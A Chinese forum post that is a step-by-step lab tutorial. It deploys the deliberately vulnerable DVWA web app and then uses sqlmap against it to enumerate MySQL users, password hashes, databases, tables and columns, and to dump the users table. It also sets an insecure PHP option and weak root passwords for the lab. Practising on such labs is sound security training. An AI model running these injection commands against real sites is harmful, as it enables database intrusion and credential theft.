奥飞火千万电 发表于 2018-10-1 07:02:54

DVWA+SQLmap+Mysql注入实战

  一、部署***测试演练系统DVWA
  1. 下载DVWA软件包
  官方下载地址:http://www.dvwa.co.uk/,当前最新版本为:DVWA-1.9
  wget https://codeload.github.com/ethicalhack3r/DVWA/zip/master
  2. 部署linux环境
  yum install -y httpd mysql mysql-server php php-mysql php-gd
  3. 开启httpd和mysqld服务
  service httpd start
  service mysqld start
  4. 测试htttp对php的解析,浏览器访问http://ip/test.php正常
  vim /var/www/html/test.php
  写入:
  
  5. 修改mysql的密码
  mysqladmin -uroot password "123456"
  6. 将DVWA-1.9.zip解压至/var/www/html,并修改属主为apache
  unzip DVWA-1.9.zip -d /var/www/html
  chown -R apache:apache /var/www/html/DVWA-1.9
  7. 修改DVWA配置文件数据库密码为123456
  vim /var/www/html/DVWA-1.9/config/config.inc.php
  修改密码:
  $_DVWA[ 'db_password' ] = '123456';

  8. 进入DVWA的web安装界面,http://ip/DVWA-1.9/setup.php,发现报错

  解决方法:
  1)编辑php的配置文件 vim /etc/php.ini
  allow_url_include = On

  2)编辑DVWA配置文件 vim /var/www/html/DVWA-1.9/config/config.inc.php
  找到创建公钥和私钥的链接:https://www.google.com/recaptcha/admin/create申请后填写在配置文件中:
  公钥:6LcY-BUUAAAAAGJ5Q0Y5zPEccMG5vCeHI1Lnwqyb
  私钥:6LcY-BUUAAAAAPvvHmppQRscfHuV0QPPuM5-Px3k



  9. 重启http,使修改的配置文件生效,刷新web界面,错误消除
  service httpd restart

  10. 点击Create/Reset Database,自动跳转到登录界面,默认用户名/密码:admin/password
  至此,DVWA已部署完成

  二、安装SQLmap漏洞查看工具
  1. 官方下载:http://sqlmap.org/http://sqlmap.org/
  版本:sqlmapproject-sqlmap-1.0.9-87-g7eab1bc.tar.gz
  2.解压sqlmap,并执行
  说明:该工具是用python写的,需安装python,它不是编译型语言,而是执行性语言,直接运行

  命令 tar -zxvfsqlmapproject-sqlmap-1.0.9-87-g7eab1bc.tar.gz
  命令 ./sqlmap.py

  3. 设置命令别名,修改vim /etc/profile,直接使用sqlmap命令
  命令 alias sqlmap='python /usr/local/src/sqlmapproject-sqlmap-7eab1bc/sqlmap.py'
  命令 source /etc/profile

  三、实战
  实战1:枚举登录MYSQL数据的用户名与密码
  实战2:枚举所有数据库
  实战3:枚举指定数据库的数据表
  实战4:获取指定数据库和表中所有列的信息
  实战5:枚举指定数据表中的所有用户名与密码
  环境准备:
  1)登录http://192.168.1.124/DVWA-1.9,将安全级别设置为最低;
  2)开启Firefox浏览器TamperData插件,等待获取cookies值;

  3)在【SQL Injection】项中,提交User>  获得注入点:http://192.168.1.124/DVWA-1.9/vulnerabilities/sqli/?id=22&Submit=Submit#
  4)TamperData弹窗获取cookies值:security=low; PHPSESSID=i5jau9v20hh5g76l450ujf5552


  实战1:枚举登录MYSQL数据的用户名与密码
  sqlmap语法参数:

[*]  -u :指定目标URL,即注入点
[*]  --cookies:当前会话的cookies值
[*]  -b:获取数据库类型,检索数据库管理系统标识
[*]  --current-db:获取当前数据库
[*]  --current-user:获取当前登录数据库使用的用户
  命令:
  sqlmap -u "http://192.168.1.124/DVWA-1.9/vulnerabilities/sqli/?id=2&Submit=Submit#" --cookie='security=low; PHPSESSID=i5jau9v20hh5g76l450ujf5552' -b--current-db--current-user
  说明:根据提示回复Y,继续

  结果:得到当前数据库为dawa,使用的用户为root@localhost

  实战2:枚举所有数据库
  sqlmap语法参数:

[*]  --users:枚举数据库用户名
[*]  -password:枚举数据库用户的密码(hash)
  命令:
  sqlmap -u "http://192.168.1.124/DVWA-1.9/vulnerabilities/sqli/?id=2&Submit=Submit#" --cookie='security=low; PHPSESSID=i5jau9v20hh5g76l450ujf5552' --string="Surname" --users --password

  说明:选择目录下字典文件,暴力破解

  结果:数据库用户名为root,密码也有明文形式123456

  实战3:枚举数据库和指定数据库的数据表
  sqlmap语法参数:

[*]  --dbs:枚举当前数据库
  命令:
  sqlmap -u "http://192.168.1.124/DVWA-1.9/vulnerabilities/sqli/?id=2&Submit=Submit#" --cookie='security=low; PHPSESSID=i5jau9v20hh5g76l450ujf5552' --string="Surname" --dbs
  结果:mysql下所有的数据库

  命令:
  sqlmap -u "http://192.168.1.124/DVWA-1.9/vulnerabilities/sqli/?id=2&Submit=Submit#" --cookie='security=low; PHPSESSID=i5jau9v20hh5g76l450ujf5552' --string="Surname" -D dvwa --tables
  结果:dvwa库中,所有的表

  实战4:获取指定数据库和表中所有列的信息
  sqlmap语法参数:

[*]  -D:指定的数据库
[*]  -T:指定数据库中的数据表
[*]  --columns:获取列的信息
  命令:
  sqlmap -u "http://192.168.1.124/DVWA-1.9/vulnerabilities/sqli/?id=2&Submit=Submit#" --cookie='security=low; PHPSESSID=i5jau9v20hh5g76l450ujf5552' --string="Surname" -D dvwa -T users --columns
  结果:dvwa库,users表中所有字段信息

  实战5:枚举指定数据表中的所有用户名与密码
  sqlmap语法参数:

[*]  -C:枚举数据表中的列
[*]  --dump:存储数据表项
  命令:
  sqlmap -u "http://192.168.1.124/DVWA-1.9/vulnerabilities/sqli/?id=2&Submit=Submit#" --cookie='security=low; PHPSESSID=i5jau9v20hh5g76l450ujf5552' --string="Surname" -D dvwa -T users -C user,password --dump
  结果:dvwa库,users表中user字段和password字段信息,最后表中信息转存文件中


页: [1]
查看完整版本: DVWA+SQLmap+Mysql注入实战